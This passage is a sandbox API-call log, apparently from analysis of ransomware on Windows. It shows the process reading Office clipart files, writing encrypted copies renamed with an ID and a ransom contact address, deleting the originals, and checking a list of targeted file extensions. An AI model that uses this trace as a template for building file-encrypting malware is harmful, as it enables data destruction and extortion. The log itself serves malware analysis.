liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.312] SetEndOfFile (hFile=0x21c) returned 1 [0053.313] CloseHandle (hObject=0x21c) returned 1 [0053.313] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.313] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif")) returned 1 [0053.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0053.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0053.313] lstrlenW (lpString=".doc") returned 4 [0053.313] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.313] lstrlenW (lpString=".docx") returned 5 [0053.313] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.313] lstrlenW (lpString=".pdf") returned 4 [0053.313] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.313] lstrlenW (lpString=".xls") returned 4 [0053.313] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.313] lstrlenW (lpString=".xlsx") returned 5 [0053.313] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.314] lstrlenW (lpString=".ppt") returned 4 [0053.314] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0053.314] lstrlenW (lpString=".zip") returned 4 [0053.314] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.314] lstrlenW (lpString=".rar") returned 4 [0053.314] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.314] lstrlenW (lpString=".bz2") returned 4 [0053.314] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.314] lstrlenW (lpString=".7z") returned 3 [0053.314] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0053.314] lstrlenW (lpString=".dbf") returned 4 [0053.314] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0053.314] lstrlenW (lpString=".1cd") returned 4 [0053.314] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0053.314] lstrlenW (lpString=".jpg") returned 4 [0053.314] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.314] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=5253) returned 1 [0053.314] CloseHandle (hObject=0x21c) returned 1 [0053.315] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif")) returned 0x20 [0053.315] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0053.315] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.315] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.315] GetLastError () returned 0x0 [0053.315] ReadFile (in: hFile=0x21c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x1485, lpOverlapped=0x0) returned 1 [0053.317] WriteFile (in: hFile=0x218, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x1490, lpOverlapped=0x0) returned 1 [0053.318] ReadFile (in: hFile=0x21c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.318] WriteFile (in: hFile=0x218, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.318] SetEndOfFile (hFile=0x218) returned 1 [0053.318] CloseHandle (hObject=0x218) returned 1 [0053.318] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.318] SetEndOfFile (hFile=0x21c) returned 1 [0053.319] CloseHandle (hObject=0x21c) returned 1 [0053.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.319] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif")) returned 1 [0053.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.320] lstrlenW (lpString=".doc") returned 4 [0053.320] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.320] lstrlenW (lpString=".docx") returned 5 [0053.320] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.320] lstrlenW (lpString=".pdf") returned 4 [0053.320] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.320] lstrlenW (lpString=".xls") returned 4 [0053.320] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.320] lstrlenW (lpString=".xlsx") returned 5 [0053.320] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.320] lstrlenW (lpString=".ppt") returned 4 [0053.320] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.320] lstrlenW (lpString=".zip") returned 4 [0053.320] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.320] lstrlenW (lpString=".rar") returned 4 [0053.320] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.320] lstrlenW (lpString=".bz2") returned 4 [0053.320] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.320] lstrlenW (lpString=".7z") returned 3 [0053.320] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.320] lstrlenW (lpString=".dbf") returned 4 [0053.320] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.320] lstrlenW (lpString=".1cd") returned 4 [0053.320] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.320] lstrlenW (lpString=".jpg") returned 4 [0053.320] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.322] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.322] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.322] GetLastError () returned 0x0 [0053.324] ReadFile (in: hFile=0x21c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0xa24, lpOverlapped=0x0) returned 1 [0053.325] WriteFile (in: hFile=0x218, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xa30, lpOverlapped=0x0) returned 1 [0053.328] ReadFile (in: hFile=0x21c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.328] WriteFile (in: hFile=0x218, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.328] SetEndOfFile (hFile=0x218) returned 1 [0053.329] CloseHandle (hObject=0x218) returned 1 [0053.329] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.329] SetEndOfFile (hFile=0x21c) returned 1 [0053.329] CloseHandle (hObject=0x21c) returned 1 [0053.330] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.330] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif")) returned 1 [0053.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0053.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0053.330] lstrlenW (lpString=".doc") returned 4 [0053.330] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.330] lstrlenW (lpString=".docx") returned 5 [0053.330] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.330] lstrlenW (lpString=".pdf") returned 4 [0053.330] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.330] lstrlenW (lpString=".xls") returned 4 [0053.330] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.330] lstrlenW (lpString=".xlsx") returned 5 [0053.330] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.330] lstrlenW (lpString=".ppt") returned 4 [0053.330] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0053.331] lstrlenW (lpString=".zip") returned 4 [0053.331] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.331] lstrlenW (lpString=".rar") returned 4 [0053.331] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.331] lstrlenW (lpString=".bz2") returned 4 [0053.331] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.331] lstrlenW (lpString=".7z") returned 3 [0053.331] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0053.331] lstrlenW (lpString=".dbf") returned 4 [0053.331] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0053.331] lstrlenW (lpString=".1cd") returned 4 [0053.331] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0053.331] lstrlenW (lpString=".jpg") returned 4 [0053.331] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.332] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=10607) returned 1 [0053.332] CloseHandle (hObject=0x21c) returned 1 [0053.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif")) returned 0x20 [0053.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.332] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0053.333] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.333] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.333] GetLastError () returned 0x0 [0053.333] ReadFile (in: hFile=0x21c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x296f, lpOverlapped=0x0) returned 1 [0053.335] WriteFile (in: hFile=0x218, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x2970, lpOverlapped=0x0) returned 1 [0053.336] ReadFile (in: hFile=0x21c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.336] WriteFile (in: hFile=0x218, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.336] SetEndOfFile (hFile=0x218) returned 1 [0053.336] CloseHandle (hObject=0x218) returned 1 [0053.336] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.336] SetEndOfFile (hFile=0x21c) returned 1 [0053.337] CloseHandle (hObject=0x21c) returned 1 [0053.337] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.337] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif")) returned 1 [0053.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0053.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0053.337] lstrlenW (lpString=".doc") returned 4 [0053.337] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.337] lstrlenW (lpString=".docx") returned 5 [0053.337] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.337] lstrlenW (lpString=".pdf") returned 4 [0053.337] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.337] lstrlenW (lpString=".xls") returned 4 [0053.337] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.337] lstrlenW (lpString=".xlsx") returned 5 [0053.338] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.338] lstrlenW (lpString=".ppt") returned 4 [0053.338] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0053.338] lstrlenW (lpString=".zip") returned 4 [0053.338] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.338] lstrlenW (lpString=".rar") returned 4 [0053.338] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.338] lstrlenW (lpString=".bz2") returned 4 [0053.338] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.338] lstrlenW (lpString=".7z") returned 3 [0053.338] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0053.338] lstrlenW (lpString=".dbf") returned 4 [0053.338] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0053.339] lstrlenW (lpString=".1cd") returned 4 [0053.339] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0053.339] lstrlenW (lpString=".jpg") returned 4 [0053.339] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.339] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=15308) returned 1 [0053.339] CloseHandle (hObject=0x21c) returned 1 [0053.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif")) returned 0x20 [0053.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0053.340] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.340] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.340] GetLastError () returned 0x0 [0053.340] ReadFile (in: hFile=0x21c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x3bcc, lpOverlapped=0x0) returned 1 [0053.342] WriteFile (in: hFile=0x218, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x3bd0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x3bd0, lpOverlapped=0x0) returned 1 [0053.343] ReadFile (in: hFile=0x21c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.343] WriteFile (in: hFile=0x218, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.344] SetEndOfFile (hFile=0x218) returned 1 [0053.344] CloseHandle (hObject=0x218) returned 1 [0053.344] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.344] SetEndOfFile (hFile=0x21c) returned 1 [0053.345] CloseHandle (hObject=0x21c) returned 1 [0053.345] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.345] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif")) returned 1 [0053.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0053.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0053.345] lstrlenW (lpString=".doc") returned 4 [0053.345] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.345] lstrlenW (lpString=".docx") returned 5 [0053.345] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.345] lstrlenW (lpString=".pdf") returned 4 [0053.345] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.345] lstrlenW (lpString=".xls") returned 4 [0053.345] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.345] lstrlenW (lpString=".xlsx") returned 5 [0053.345] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.345] lstrlenW (lpString=".ppt") returned 4 [0053.345] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0053.346] lstrlenW (lpString=".zip") returned 4 [0053.346] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.346] lstrlenW (lpString=".rar") returned 4 [0053.346] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.346] lstrlenW (lpString=".bz2") returned 4 [0053.346] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.346] lstrlenW (lpString=".7z") returned 3 [0053.346] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0053.346] lstrlenW (lpString=".dbf") returned 4 [0053.346] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0053.346] lstrlenW (lpString=".1cd") returned 4 [0053.346] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0053.346] lstrlenW (lpString=".jpg") returned 4 [0053.346] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.346] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=5315) returned 1 [0053.346] CloseHandle (hObject=0x21c) returned 1 [0053.346] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif")) returned 0x20 [0053.346] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0053.347] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.347] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 